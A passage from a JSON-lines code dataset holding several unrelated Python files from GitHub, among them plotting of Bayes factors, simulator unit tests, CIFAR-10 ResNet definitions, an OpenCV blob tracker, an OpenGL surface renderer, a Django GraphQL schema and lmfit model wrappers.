[-.1,.1]\n plt.clf()\n plt.rcParams.update({'font.size': 18})\n plt.figure(figsize=(15, 10))\n for index in range(len(methods)):\n plt.bar(x_axis+spacing[index],methods_BFs[index],.15,yerr=methods_uncerts[index],label=labels[index],color=colors[index])\n #plt.bar(x_axis+spacing[index],methods_BFs[index],.15,label=labels[index],color=colors[index])\n\n if log == False: plt.ylim(top=1.2)\n plt.xticks(x_axis,eosList,rotation=45,ha=\"right\")\n ax = plt.gca()\n if log == True: ax.set_yscale(\"log\")\n plt.legend()\n plt.xlabel(\"EoSs\")\n plt.ylabel(\"Joint Bayes Factor\")\n plt.title(\"EoS Joint Bayes Factors w.r.t. SLY\")\n label = uLTs_File.split('/')[-2]\n plt.savefig(\"plots/2D_3D/{}_barplot_2D_3D_BFs.png\".format(label))\n\n Dictionary = {labels[Index]:{eosList[eIndex]:[methods_BFs[Index][eIndex],methods_uncerts[Index][eIndex]] for eIndex in range(len(eosList))} for Index in range(len(labels))}\n with open(\"plots/2D_3D/data/{}_2D_3D_BFs.json\".format(label),\"w\") as f:\n json.dump(Dictionary, f, indent=2, sort_keys=True)\n\n\ndef multipleEventBFs(log=False):\n # Makes barplot of jointBFs using all simulations comparing that of uP(LTs) \n # and uP(Ls) (with errorbars!).\n\n uLTs_Dir = \"../bilby_runs/3dkde_studies/Anarya_uniformLTs/phenom-injections/TaylorF2/\"\n uLs_Dir = \"../bilby_runs/3dkde_studies/outdir/Phenom_Taylor/IMRPhenomPv2_NRTidal/APR4_EPP/\"\n uLTs_Files = glob.glob(\"{}/*/*.json\".format(uLTs_Dir))\n uLs_Files = glob.glob(\"{}/*/*.json\".format(uLs_Dir))\n\n stack_uLTs = ems.Stacking(uLTs_Files,kdedim=2)\n stack_uLs = ems.Stacking(uLs_Files,kdedim=3)\n\n labels = [\"UniformP (dL~,L~)\", \"UniformP (L1,L2)\"]\n colors = [\"#66c2a5\",\"#fc8d62\"]\n stacks = [stack_uLTs, stack_uLs]\n eosList = [\"BHF_BBB2\",\"KDE0V\",\"SKOP\",\"H4\",\"HQC18\",\"SKMP\",\"APR4_EPP\",\"MPA1\",\"MS1_PP\",\"MS1B_PP\"]\n stacks_BFs = []\n stacks_uncerts = []\n for stack in stacks:\n print(stack)\n BFs = []\n uncerts = []\n for eos in eosList:\n print(eos)\n bf, bf_trials = stack.stack_events(EoS1=eos,EoS2=\"SLY\",trials=1000)\n #bf = stack.stack_events(EoS1=eos,EoS2=\"SLY\",trials=0)\n uncert = np.std(bf_trials) * 2\n BFs.append(bf)\n uncerts.append(uncert)\n stacks_BFs.append(BFs)\n stacks_uncerts.append(uncerts)\n\n x_axis = np.arange(len(eosList))\n spacing = [-.1,.1]\n plt.clf()\n plt.rcParams.update({'font.size': 18})\n plt.figure(figsize=(15, 10))\n for index in range(len(stacks)):\n plt.bar(x_axis+spacing[index],stacks_BFs[index],.15,yerr=stacks_uncerts[index],label=labels[index],color=colors[index])\n #plt.bar(x_axis+spacing[index],stacks_BFs[index],.15,label=labels[index],color=colors[index])\n\n if log == False: plt.ylim(top=1.2)\n plt.xticks(x_axis,eosList,rotation=45,ha=\"right\")\n ax = plt.gca()\n if log == True: ax.set_yscale(\"log\")\n plt.legend()\n plt.xlabel(\"EoSs\")\n plt.ylabel(\"Joint Bayes Factor\")\n plt.title(\"EoS Joint Bayes Factors w.r.t. SLY\")\n plt.savefig(\"plots/2D_3D/allJoint_barplot_2D_3D_BFs.png\")\n\n Dictionary = {labels[Index]:{eosList[eIndex]:[stacks_BFs[Index][eIndex],stacks_uncerts[Index][eIndex]] for eIndex in range(len(eosList))} for Index in range(len(labels))}\n with open(\"plots/2D_3D/data/allJoint_2D_3D_BFs.json\",\"w\") as f:\n json.dump(Dictionary, f, indent=2, sort_keys=True)\n\n","repo_name":"mickbrawler/GWXtreme_Tasks","sub_path":"year2/PhenomTaylorCompare/_2D_3D_BFs_plot.py","file_name":"_2D_3D_BFs_plot.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4872771672","text":"import unittest\n\nfrom API.GridLocation.GridLocation import GridLocation\nfrom API.GridLocation.GridLocationType import GridLocationType\nfrom API.GridLocation.Heatmap import Heatmap\nfrom API.GridLocation.HeatmapType import HeatmapType\nfrom API.WebClasses import WebPathOwner, WebSpaceOwner\nfrom Demos.FCFS import FCFSPathBiddingStrategy, FCFSPathValueFunction, FCFSSpaceBiddingStrategy, FCFSSpaceValueFunction\nfrom Simulator import Coordinate2D, Coordinate3D, Coordinate4D, Environment, StaticBlocker\n\n\nclass OwnerTest(unittest.TestCase):\n def setUp(self) -> None:\n self.path_owner = WebPathOwner(\"Test Path Owner\",\n \"testosteroni\",\n \"#123456\",\n [GridLocation(str(GridLocationType.RANDOM.value)),\n GridLocation(str(GridLocationType.RANDOM.value))],\n [10],\n FCFSPathBiddingStrategy(),\n FCFSPathValueFunction(),\n 1, 1000, 1, {})\n self.space_owner = WebSpaceOwner(\"Test Space Owner\",\n \"Bluberatus\",\n \"#654321\",\n [GridLocation(str(GridLocationType.HEATMAP.value),\n heatmap=Heatmap(\n heatmap_type=str(HeatmapType.INVERSE_SPARSE.value),\n inverse_sparse={0.1: [Coordinate2D(20, 20),\n Coordinate2D(30, 30)]}))],\n [10],\n Coordinate4D(3, 3, 1, 10),\n FCFSSpaceBiddingStrategy(),\n FCFSSpaceValueFunction(),\n {})\n self.env = Environment(Coordinate4D(100, 100, 100, 1000), min_height=10)\n\n def test_generate_stop_coordinates(self):\n blocky = StaticBlocker(Coordinate3D(0, 0, 0), Coordinate3D(100, 20, 100))\n blocky.id = 3\n blocky.add_to_tree(self.env.blocker_tree, Coordinate4D(0, 0, 0, 100))\n self.env.blocker_dict[blocky.id] = blocky\n stop = WebPathOwner.generate_stop_coordinate(GridLocation(str(GridLocationType.RANDOM.value)), self.env, 4, 1)\n self.assertTrue(stop.y >= self.env.min_height)\n self.assertFalse(self.env.is_coordinate_blocked_forever(stop, 1))\n\n def test_generate_stop_coordinates_2(self):\n blocky = StaticBlocker(Coordinate3D(0, 0, 0), Coordinate3D(100, 100, 100))\n blocky.id = 4\n blocky.add_to_tree(self.env.blocker_tree, Coordinate4D(0, 0, 0, 1000))\n self.env.blocker_dict[blocky.id] = blocky\n stop = WebPathOwner.generate_stop_coordinate(GridLocation(str(GridLocationType.RANDOM.value)), self.env, 4, 1)\n self.assertTrue(self.env.is_coordinate_blocked_forever(stop, 1))\n\n def test_generate_agents_path(self):\n stops = self.path_owner.generate_agents(0, self.env)\n self.assertEqual(len(stops), 0)\n\n stops_2 = self.path_owner.generate_agents(10, self.env)\n self.assertEqual(len(self.path_owner.agents), 1)\n self.assertEqual(len(stops_2[0].locations), 2)\n self.assertGreaterEqual(stops_2[0].locations[-1].t - stops_2[0].locations[-0].t,\n stops_2[0].locations[-1].distance(stops_2[0].locations[0]) * stops_2[\n 0].speed)\n\n def test_generate_stop_coordinate(self):\n stop = WebSpaceOwner.generate_stop_coordinates(GridLocation(str(GridLocationType.HEATMAP.value),\n heatmap=Heatmap(\n heatmap_type=str(\n HeatmapType.INVERSE_SPARSE.value),\n inverse_sparse={\n 0.1: [Coordinate2D(20, 20),\n Coordinate2D(30, 30)]})),\n self.env, 10)\n self.assertTrue(\n stop.inter_temporal_equal(Coordinate4D(20, self.env.min_height, 20, 11)) or stop.inter_temporal_equal(\n Coordinate4D(30, self.env.min_height, 30, 11)))\n\n def test_generate_agents_space(self):\n agents = self.space_owner.generate_agents(10, self.env)\n self.assertEqual(len(agents), 1)\n self.assertEqual(len(agents[0].blocks), 1)\n self.assertEqual(agents[0].blocks[0].max - agents[0].blocks[0].min, self.space_owner.size)\n\n def test_tombola_inverse(self):\n heatmap = Heatmap(heatmap_type=str(HeatmapType.INVERSE_SPARSE.value), inverse_sparse={\n 0.1: [Coordinate2D(1, 1), Coordinate2D(1, 2), Coordinate2D(2, 1), Coordinate2D(2, 2)],\n 0.2: [Coordinate2D(3, 3), Coordinate2D(3, 4), Coordinate2D(4, 3), Coordinate2D(4, 4)],\n 0.8: [Coordinate2D(8, 8), Coordinate2D(8, 9), Coordinate2D(9, 8), Coordinate2D(9, 9)]\n })\n tombola = heatmap.assemble_tombola()\n self.assertEqual(tombola.count(Coordinate2D(1, 1)), 1)\n self.assertEqual(tombola.count(Coordinate2D(2, 2)), 1)\n self.assertEqual(tombola.count(Coordinate2D(3, 3)), 2)\n self.assertEqual(tombola.count(Coordinate2D(4, 4)), 2)\n self.assertEqual(tombola.count(Coordinate2D(8, 8)), 8)\n self.assertEqual(tombola.count(Coordinate2D(9, 8)), 8)\n\n def test_tombola_matrix(self):\n matrix = [[min(i, j) / 10 for j in range(10)] for i in range(10)]\n heatmap = Heatmap(heatmap_type=str(HeatmapType.MATRIX.value),\n matrix=matrix)\n tombola = heatmap.assemble_tombola()\n self.assertEqual(tombola.count(Coordinate2D(1, 1)), 1)\n self.assertEqual(tombola.count(Coordinate2D(2, 2)), 2)\n self.assertEqual(tombola.count(Coordinate2D(3, 3)), 3)\n self.assertEqual(tombola.count(Coordinate2D(4, 4)), 4)\n self.assertEqual(tombola.count(Coordinate2D(8, 8)), 8)\n self.assertEqual(tombola.count(Coordinate2D(9, 8)), 8)\n\n def test_tombola_sparse(self):\n heatmap = Heatmap(heatmap_type=str(HeatmapType.SPARSE.value),\n sparse={\n Coordinate2D(1, 1): 0.1,\n Coordinate2D(2, 2): 0.2,\n Coordinate2D(3, 3): 0.3,\n Coordinate2D(4, 4): 0.4,\n Coordinate2D(8, 8): 0.8,\n Coordinate2D(9, 8): 0.8,\n })\n tombola = heatmap.assemble_tombola()\n self.assertEqual(tombola.count(Coordinate2D(1, 1)), 1)\n self.assertEqual(tombola.count(Coordinate2D(2, 2)), 2)\n self.assertEqual(tombola.count(Coordinate2D(3, 3)), 3)\n self.assertEqual(tombola.count(Coordinate2D(4, 4)), 4)\n self.assertEqual(tombola.count(Coordinate2D(8, 8)), 8)\n self.assertEqual(tombola.count(Coordinate2D(9, 8)), 8)\n","repo_name":"AirspaceAuctionSimulator/AirspaceAuctionSimulator","sub_path":"test/test_owner.py","file_name":"test_owner.py","file_ext":"py","file_size_in_byte":7468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26777745464","text":"import logging\nimport sys\n\n\nclass Logger:\n\n @staticmethod\n def prepare_logger():\n logger = logging.getLogger('TEST_LOGGER')\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(asctime)s : %(message)s\", datefmt=\"%d-%m-%Y %H:%M:%S\")\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n","repo_name":"kargolek/my-selenium-python-dojo","sub_path":"utilities/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21333260960","text":"############ WORKING ############\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom .block import conv3x3, conv1x1, norm\nfrom .block import BasicBlock, Bottleneck, ResBlock\n\n\ndef make_block_sequence(block, inplanes=64, planes=64, blocks=2, stride=1) :\n downsample = None\n if stride != 1 or inplanes != planes * block.expansion :\n downsample = nn.Sequential(\n conv1x1(inplanes, planes*block.expansion, stride),\n norm(planes*block.expansion)\n )\n\n layers = []\n layers.append(block(inplanes=inplanes, planes=planes, stride=stride, downsample=downsample))\n nextplanes = planes * block.expansion\n for _ in range(1,blocks) :\n layers.append(block(nextplanes, planes))\n\n return nn.Sequential(*layers), nextplanes\n\n\nclass CIFAR10Module(nn.Module) :\n def __init__(self, block, layers=1, num_classes=10, init_channel=16, norm_type=\"b\", downsample_type=\"r\") :\n super(CIFAR10Module,self).__init__()\n channel = init_channel\n self.conv = conv3x3(3,channel)\n self.block1 = nn.Sequential(\n *[block(channel,channel, norm_type=norm_type) for _ in range(layers)]\n )\n self.sub1 = self._subsample(channel, channel*2, norm_type=norm_type, block_type=downsample_type)\n channel *= 2\n self.block2 = nn.Sequential(\n *[block(channel,channel, norm_type=norm_type) for _ in range(layers)]\n )\n self.sub2 = self._subsample(channel, channel*2, norm_type=norm_type, block_type=downsample_type)\n channel *= 2\n self.block3 = nn.Sequential(\n *[block(channel,channel, norm_type=norm_type) for _ in range(layers)]\n )\n\n self.avg = nn.AdaptiveAvgPool2d((1,1))\n self.fc = nn.Linear(channel,num_classes)\n\n for m in self.modules() :\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear) :\n nn.init.kaiming_uniform_(m.weight, a=np.sqrt(5)*layers)\n if m.bias is not None : \n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(m.weight)\n bound = 1 / np.sqrt(fan_in)\n nn.init.uniform_(m.bias, -bound, bound)\n if isinstance(m, nn.BatchNorm2d) :\n nn.init.uniform_(m.weight)\n nn.init.zeros_(m.bias)\n\n def _subsample(self, inplanes, planes, stride=2, norm_type=\"b\", block_type=\"r\") :\n downsample = nn.Sequential(\n conv1x1(inplanes, planes, stride),\n norm(planes, norm_type=norm_type)\n )\n return ResBlock(inplanes, planes, stride=stride, downsample=downsample, norm_type=norm_type)\n\n def forward(self, x) :\n out = self.conv(x)\n out = self.block1(out)\n out = self.sub1(out)\n\n out = self.block2(out)\n out = self.sub2(out)\n\n out = self.block3(out)\n\n out = self.avg(out)\n out = out.view(out.size(0),-1)\n out = self.fc(out)\n\n return out\n\n def loss(self) :\n return nn.CrossEntropyLoss()\n\n\nclass CIFARConv(nn.Module) :\n def __init__(self, init_channel=64, expansion=2, norm_type=\"b\") :\n super(CIFARConv,self).__init__()\n self.conv = conv3x3(3, init_channel)\n self.conv1 = self.conv_unit(init_channel, expansion=expansion, norm_type=norm_type)\n init_channel *= 2\n self.conv2 = self.conv_unit(init_channel, expansion=expansion, norm_type=norm_type)\n init_channel *= 2 \n self.conv3 = self.conv_unit(init_channel, expansion=expansion, norm_type=norm_type)\n init_channel *= 2\n self.avgpool = nn.AdaptiveAvgPool2d((1,1))\n self.fc1 = nn.Linear(512,64)\n self.fc2 = nn.Linear(64,10)\n\n def conv_unit(self, planes, expansion=2, norm_type=\"b\") :\n unit = nn.Sequential(\n conv3x3(planes, planes),\n nn.MaxPool2d(2, stride=1, padding=1),\n norm(planes, norm_type),\n nn.ReLU(inplace=True),\n conv3x3(planes, planes*expansion),\n nn.MaxPool2d(2, stride=2),\n norm(planes*expansion, norm_type),\n nn.ReLU(inplace=True)\n )\n return unit\n\n def forward(self, x) :\n out = self.conv(x)\n out = self.conv1(out)\n out = self.conv2(out)\n out = self.conv3(out)\n out = self.avgpool(out)\n out = out.view(out.size(0),-1)\n out = self.fc1(out)\n out = self.fc2(out)\n return out\n\n def loss(self) :\n return nn.CrossEntropyLoss()\n\n\ndef cifar_model(block_type=\"res\", layers=6, norm_type=\"b\") :\n if block_type == \"res\" :\n return CIFAR10Module(block=ResBlock, layers=layers, norm_type=norm_type)\n elif block_type == \"wres\" :\n return CIFAR10Module(block=ResBlock, layers=layers, norm_type=norm_type, init_channel=80)\n elif block_type == \"conv\" :\n return CIFARConv(norm_type=norm_type)\n \n","repo_name":"matbambbang/pgd_adversarial_training","sub_path":"model/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"2749527595","text":"import cv2\nimport sys\nimport numpy as np\n\ndetect_init = True\n\n# Set up tracker\ndef tracker_type(name):\n if name == 'BOOSTING':\n tracker = cv2.TrackerBoosting_create()\n if name == 'MIL':\n tracker = cv2.TrackerMIL_create()\n if name == 'KCF':\n tracker = cv2.TrackerKCF_create()\n if name == 'TLD':\n tracker = cv2.TrackerTLD_create()\n if name == 'MEDIANFLOW':\n tracker = cv2.TrackerMedianFlow_create()\n if name == 'GOTURN':\n tracker = cv2.TrackerGOTURN_create()\n return tracker\n\n# Set up blob detector\ndef blob_detector():\n params = cv2.SimpleBlobDetector_Params()\n\n # Change thresholds\n params.minThreshold = 0;\n params.maxThreshold = 256;\n \n # Filter by Area.\n params.filterByArea = True\n params.minArea = 100\n # params.maxArea = 1000\n \n # Filter by Circularity\n params.filterByCircularity = True\n params.minCircularity = 0.5\n # params.maxCircularity = 1\n \n # Filter by Convexity\n params.filterByConvexity = True\n params.minConvexity = 0.5\n # params.maxConvexity = 1\n \n # Filter by Inertia\n params.filterByInertia =True\n params.minInertiaRatio = 0.5\n # params.maxInertiaRatio = 1\n \n # Create blob detector\n detector = cv2.SimpleBlobDetector_create(params)\n return detector\n\ndef detector_func(video_object):\n global detect_init\n # Detector Parameters \n detector = blob_detector()\n\n while video_object.isOpened():\n \n # Read video frame\n ret, frame = video_object.read()\n\n # Convert input frame to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # Show frames\n # cv2.imshow('Original Frame', frame)\n # cv2.imshow('Grayscale Frame', gray)\n # cv2.imshow('HSV Frame', hsv)\n\n # Keypoints\n kp = detector.detect(gray)\n\n # Create frame and draw obatined keypoints\n img_kp = cv2.drawKeypoints(frame, kp, np.array([]), (0,0,255), cv2.DrawMatchesFlags_DRAW_RICH_KEYPOINTS)\n # Show frame with keypoint(s) \n cv2.imshow('Keypoints', img_kp)\n\n # If any blob(s) are found, sort them and return the biggest blob\n if len(kp):\n kp.sort(key = (lambda s : s.size))\n kp = kp[-1] # Last element (biggest size)\n\n blob = True\n x = kp.pt[0] # Blob center x-coordinate\n y = kp.pt[1] # Blob center y-coordinate\n d = kp.size # Blob diameter\n\n else:\n blob = False\n x = 0\n y = 0\n d = 0\n \n # Break loop if not a inital detection and a blob is found and \n if not detect_init and blob:\n return (x, y, d)\n\n # Break loop on keystroke ('q')\n if cv2.waitKey(1) & 0xFF == ord('q'):\n detect_init = False\n return (x, y, d)\n\n# Object tracking \ndef tracker_func(video_object):\n \n reset = False\n # Read video frame\n ret, frame = video_object.read()\n\n # Choose tracker\n tracker = tracker_type('KCF')\n\n # Initial detection\n # detect_init = True\n (x, y, d) = detector_func(video_object)\n \n # Bounding box (x0, y0, w, h)\n bbox = (x - d/2, y - d/2, d, d)\n ret = tracker.init(frame, bbox)\n\n while (video_object.isOpened()):\n # Read a new frame\n ok, frame = video_object.read()\n\n # Update tracker\n ok, bbox = tracker.update(frame)\n\n # Draw bounding box\n if ok:\n # Tracking success\n c_x = int(bbox[0] + d/2) # Circle center x-coordinate\n c_y = int(bbox[1] + d/2) # Circle center y-coordinate\n c_r = int(bbox[3]/2) # Circle radius\n cv2.circle(frame, (c_x, c_y), c_r, (255, 0 , 0), 1, 1)\n else :\n # Tracking failure\n cv2.putText(frame, 'Tracking Failure', (20, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 2)\n # detect_init = False\n # tracker_func(video_object)\n # Reset Detect object\n reset = True\n # (x, y, d) = detector_func(video_object)\n # print('I am trying')\n # bbox = (x - d/2, y - d/2, d, d)\n # ret = tracker.init(frame, bbox)\n\n cv2.imshow('Tracking Frame', frame)\n\n if reset:\n video_object.release()\n # cam_feed()\n\n # tracker_func(video_object)\n # Break loop on keystroke ('r')\n if cv2.waitKey(1) & 0xFF == ord('r'):\n break\n\n\n# Live camera feed\ndef cam_feed():\n # Create an object of web camera\n video = cv2.VideoCapture(0)\n\n # Throw an error if video is not opened\n if not video.isOpened():\n print('Could not open video')\n sys.exit()\n\n # detect_init = True\n # (x, y, d) = detector_func(video, detect_init)\n # print(x,y,d)\n # print(detect_init)\n tracker_func(video)\n # tracker = tracker_type('KCF')\n # print(tracker)\nif __name__ == '__main__':\n # detect_init = True\n cam_feed()\n cv2.destroyAllWindows()\n","repo_name":"jantolsen/motionlab-kinect","sub_path":"opencv_python/cam3.py","file_name":"cam3.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74249611288","text":"from Domain.vanzare2 import get_gen, get_titlu\n\n\ndef nr_titluri_distincte(lst_vanzari):\n \"\"\"\n Determina numarul de titluri distincte corespunzator fiecarui gen\n :param lst_vanzari: lista de vanzari (de carti)\n :return: numarul de titluri distincte corespunzator fiecarui gen\n \"\"\"\n if len(lst_vanzari) == 0:\n raise ValueError(\"Lista nu poate fi goala!\")\n\n result = {}\n lst_titluri = []\n for vanzare in lst_vanzari:\n gen = get_gen(vanzare)\n titlu = get_titlu(vanzare)\n if gen in result:\n if titlu not in lst_titluri:\n lst_titluri.append(titlu)\n result[gen] = result[gen] + 1\n else:\n result[gen] = 1\n lst_titluri.append(titlu)\n return result\n","repo_name":"AP-MI-2021/lab-567-Jocia276","sub_path":"Logic/nr_titluri_distincte.py","file_name":"nr_titluri_distincte.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38788278218","text":"from visuals.visitems.visitem import VisualItem\n\nimport numpy as np\nimport OpenGL.GL as gl\nimport OpenGL.arrays.vbo as glvbo\n\n\nclass SurfaceVisItem(VisualItem):\n\n def __init__(self, points, triangles, normals, cull_back=True, is_ccw=False):\n super(SurfaceVisItem, self).__init__()\n self.vbo_points = None\n self.vbo_normals = None\n self.vbo_indices = None\n self.mouse_is_pressed = False\n self.points = points\n self.normals = -normals\n self.triangles = triangles\n self.angle_x = 0.0\n self.angle_y = 0.0\n self.angle_z = 0.0\n self.cull_back = cull_back\n self.is_ccw = is_ccw\n\n def initGL(self):\n self.vbo_points = glvbo.VBO(self.points, usage=gl.GL_DYNAMIC_DRAW)\n self.vbo_normals = glvbo.VBO(self.normals, usage=gl.GL_DYNAMIC_DRAW)\n self.vbo_indices = glvbo.VBO(self.triangles, target=gl.GL_ELEMENT_ARRAY_BUFFER)\n\n def drawGL(self):\n gl.glPushAttrib(gl.GL_CURRENT_BIT)\n gl.glEnableClientState(gl.GL_VERTEX_ARRAY)\n gl.glEnableClientState(gl.GL_NORMAL_ARRAY)\n self.draw()\n gl.glDisableClientState(gl.GL_NORMAL_ARRAY)\n gl.glDisableClientState(gl.GL_VERTEX_ARRAY)\n gl.glPopAttrib()\n\n def draw(self):\n gl.glPushAttrib(gl.GL_CURRENT_BIT)\n gl.glPushMatrix()\n\n # gl.glEnable(gl.GL_DEPTH_TEST)\n # gl.glDepthFunc(gl.GL_LESS)\n #\n gl.glEnable(gl.GL_CULL_FACE)\n if self.cull_back:\n gl.glCullFace(gl.GL_BACK)\n else:\n gl.glCullFace(gl.GL_FRONT)\n\n if self.is_ccw:\n gl.glFrontFace(gl.GL_CCW)\n else:\n gl.glFrontFace(gl.GL_CW)\n #\n # gl.glEnable(gl.GL_LIGHTING)\n # gl.glEnable(gl.GL_LIGHT0)\n # gl.glEnable(gl.GL_COLOR_MATERIAL)\n # gl.glColorMaterial(gl.GL_FRONT_AND_BACK, gl.GL_AMBIENT_AND_DIFFUSE)\n #\n # # self.gl.glMaterialfv(gl.GL_FRONT, gl.GL_SPECULAR, (1.0, 1.0, 1.0, 1.0))\n # # self.gl.glMaterialf(gl.GL_FRONT, gl.GL_SHININESS, 5.0)\n # # self.gl.glMaterialfv(gl.GL_FRONT, gl.GL_AMBIENT, (0.1, 0.1, 0.1, 1.0))\n #\n # gl.glLightfv(gl.GL_LIGHT0, gl.GL_POSITION, (0.0, 0.0, -100.0, 1.0))\n #gl.glShadeModel(gl.GL_SMOOTH)\n\n gl.glRotatef(self.angle_x, 1.0, 0.0, 0.0)\n gl.glRotatef(self.angle_y, 0.0, 1.0, 0.0)\n gl.glRotatef(self.angle_z, 0.0, 0.0, 1.0)\n\n self.vbo_points.bind()\n gl.glEnableClientState(gl.GL_VERTEX_ARRAY)\n gl.glVertexPointer(3, gl.GL_FLOAT, 0, self.vbo_points)\n\n self.vbo_indices.bind()\n self.vbo_normals.bind()\n gl.glEnableClientState(gl.GL_NORMAL_ARRAY)\n gl.glNormalPointer(gl.GL_FLOAT, 0, self.vbo_normals)\n\n gl.glLineWidth(0.5)\n #gl.glColor4f(1.0, 0.1, 0.1, 1.0)\n #gl.glPolygonMode(gl.GL_FRONT_AND_BACK, gl.GL_LINE)\n gl.glColor4f(0.5, 0.5, 0.5, 1.0)\n gl.glDrawElements(gl.GL_TRIANGLES, 3 * len(self.triangles), gl.GL_UNSIGNED_INT, None)\n\n # gl.glPointSize(5.0)\n # gl.glDrawElements(gl.GL_POINTS, len(self.points), gl.GL_UNSIGNED_INT, None)\n\n gl.glDisableClientState(gl.GL_VERTEX_ARRAY)\n gl.glDisableClientState(gl.GL_NORMAL_ARRAY)\n\n self.vbo_normals.unbind()\n self.vbo_indices.unbind()\n self.vbo_points.unbind()\n\n # gl.glDisable(gl.GL_DEPTH_TEST)\n gl.glDisable(gl.GL_CULL_FACE)\n # gl.glDisable(gl.GL_LIGHTING)\n # gl.glDisable(gl.GL_LIGHT0)\n # gl.glDisable(gl.GL_COLOR_MATERIAL)\n\n gl.glPopMatrix()\n gl.glPopAttrib()\n\n def mousePressed(self, x, y, button):\n self.mouse_is_pressed = True\n\n def mouseMoved(self, x, y, button):\n pass\n\n def mouseReleased(self, x, y, button):\n self.mouse_is_pressed = False\n\n def setPoints(self, points):\n self.vbo_points.set_array(points, points.nbytes)\n #print(points.min(axis=0), points.max(axis=0))\n","repo_name":"alexeybogusevich/rs","sub_path":"Diagnostic/headrotation/visuals/visitems/surfacevis.py","file_name":"surfacevis.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72385527767","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom django.core.exceptions import ValidationError\nfrom Main.models import City, District\nfrom graphene_django.rest_framework.mutation import SerializerMutation\nfrom .serializers import CitySerializer\nfrom django.db.models import Q\nfrom graphene_django.filter import DjangoFilterConnectionField\n\n\nclass CityNode(DjangoObjectType):\n class Meta:\n model = City\n filter_fields = {\n 'name': ['exact', 'istartswith'],\n 'id': ['exact'],\n }\n interfaces = (graphene.relay.Node,)\n\n\nclass DistrictNode(DjangoObjectType):\n class Meta:\n model = District\n filter_fields = ['name']\n interfaces = (graphene.relay.Node,)\n\n\nclass CityType(DjangoObjectType):\n class Meta:\n model = City\n filter_fields = ['id', 'name']\n\n\nclass DistrictType(DjangoObjectType):\n class Meta:\n model = District\n\n\nclass Query(graphene.ObjectType):\n city = graphene.Field(CityType,\n id=graphene.Int(),\n name=graphene.String())\n all_cities = graphene.List(\n CityType,\n id=graphene.Int(),\n search=graphene.String(),\n first=graphene.Int(),\n skip=graphene.Int(),\n )\n district = graphene.Field(DistrictType,\n id=graphene.Int(),\n name=graphene.String())\n all_districts = graphene.List(DistrictType)\n\n node_cities = graphene.relay.Node.Field(CityNode)\n node_districts = graphene.relay.Node.Field(DistrictNode)\n\n\n def resolve_all_cities(self, info, search=None, first=None, skip=None, **kwargs):\n qs = City.objects.all()\n\n if search:\n filter = (\n Q(name__icontains=search) |\n Q(id__gt=search)\n )\n qs = qs.filter(filter)\n\n if skip:\n qs = qs[skip::]\n\n if first:\n qs = qs[:first]\n\n return qs\n\n def resolve_all_districts(self, info, **kwargs):\n # We can easily optimize query count in the resolve method\n return District.objects.all()\n\n def resolve_city(self, info, **kwargs):\n id = kwargs.get('id')\n name = kwargs.get('name')\n\n if id is not None:\n return City.objects.get(pk=id)\n\n if name is not None:\n return City.objects.get(name=name)\n\n return None\n\n def resolve_district(self, info, **kwargs):\n id = kwargs.get('id')\n name = kwargs.get('name')\n\n if id is not None:\n return District.objects.get(pk=id)\n\n if name is not None:\n return District.objects.get(name=name)\n\n return None\n\n\nclass CityCreateUpdateMutation(SerializerMutation):\n class Meta:\n serializer_class = CitySerializer\n model_operations = ['update', 'create']\n lookup_field = 'id'\n","repo_name":"ifdotpy/dpr.sale_backend","sub_path":"API/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42338247010","text":"\"\"\"\n Wrapper functions for lmfit.\n\n Each module of PySpectools should use these functions\n when fitting is required, rather than rewrite for each\n purpose.\n\"\"\"\n\nimport lmfit\nimport numpy as np\nimport pandas as pd\nimport peakutils\nfrom tqdm.autonotebook import tqdm\nfrom scipy import sparse\nfrom scipy.sparse.linalg import spsolve\n\nfrom pyspectools import lineshapes\n\n\nclass PySpecModel(lmfit.models.Model):\n def __init__(self, function, **kwargs):\n super(PySpecModel, self).__init__(function, **kwargs)\n self.params = self.make_params()\n\n\nclass FirstDerivLorentzian_Model(PySpecModel):\n \"\"\"\n Child class of the PySpecModel, which in itself inherits from the `lmfit` `Models` class.\n Gives the first derivative Lorentzian line shape profile for fitting.\n \"\"\"\n\n def __init__(self, **kwargs):\n super(FirstDerivLorentzian_Model, self).__init__(\n lineshapes.first_deriv_lorentzian, **kwargs\n )\n\n\nclass SecDerivLorentzian_Model(PySpecModel):\n \"\"\"\n Child class of the PySpecModel, which in itself inherits from the `lmfit` `Models` class.\n Gives the second derivative Lorentzian line shape profile for fitting.\n \"\"\"\n\n def __init__(self, **kwargs):\n super(SecDerivLorentzian_Model, self).__init__(\n lineshapes.sec_deriv_lorentzian, **kwargs\n )\n\n\nclass BJModel(PySpecModel):\n \"\"\"\n Model for fitting prolate/linear molecules.\n \"\"\"\n\n def __init__(self, **kwargs):\n super(BJModel, 